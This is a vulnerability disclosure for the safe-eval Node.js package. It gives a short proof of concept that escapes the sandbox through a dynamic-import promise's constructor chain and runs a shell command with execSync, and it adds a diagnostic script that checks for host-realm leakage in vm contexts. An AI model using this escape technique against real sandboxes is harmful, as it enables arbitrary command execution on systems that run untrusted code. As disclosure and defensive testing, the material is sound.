We found a sandbox escape vulnerability in the latest version of safe-eval (node v18.12.1).
POC:

```js
const safe_eval = require('safe-eval')
code = `
import('test').catch((e)=>{})['constructor']['constructor']('return process')().mainModule.require('child_process').execSync('touch rce')
`
safe_eval(code)
```
Our payload is inspired by CVE-2021-23449 in vm2.
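An added diagnostic, not part of the original report or of safe-eval's code: it checks, for the Node.js version it runs on, whether a value produced inside a `vm` context carries a constructor chain that belongs to the host realm, which is the property the PoC above depends on. The helper names `realmOf` and `audit` and the probe expressions are constructed for this example.

```javascript
const vm = require('node:vm');

// Hypothetical helper (not from safe-eval): evaluate `expr` in a fresh vm
// context and report which realm's Function constructor is reachable from
// the result. 'host' means sandboxed code can reach the host realm through it.
function realmOf(expr, sandbox = {}) {
  let value;
  try {
    value = vm.runInNewContext(expr, sandbox);
  } catch (err) {
    return 'error';
  }
  const reachableFunction = value.constructor.constructor;
  return reachableFunction === Function ? 'host' : 'context';
}

// Constructed probe expressions; each one only compares object identity.
function audit() {
  return {
    // Objects created by the context itself stay in the context's realm.
    literal: realmOf('({})'),
    nativePromise: realmOf('Promise.resolve(1)'),
    // Any host object handed in through the sandbox keeps its host prototype.
    injectedObject: realmOf('cfg', { cfg: {} }),
    // The promise shape used in the report; the result depends on the Node version.
    dynamicImport: realmOf("import('test').catch(() => {})"),
  };
}

console.log(audit());
```

A `host` result for `dynamicImport` means the pattern reported here applies to that runtime. Node's own documentation states that the `vm` module is not a security mechanism, so untrusted code needs an isolation boundary outside the process rather than a `vm` context.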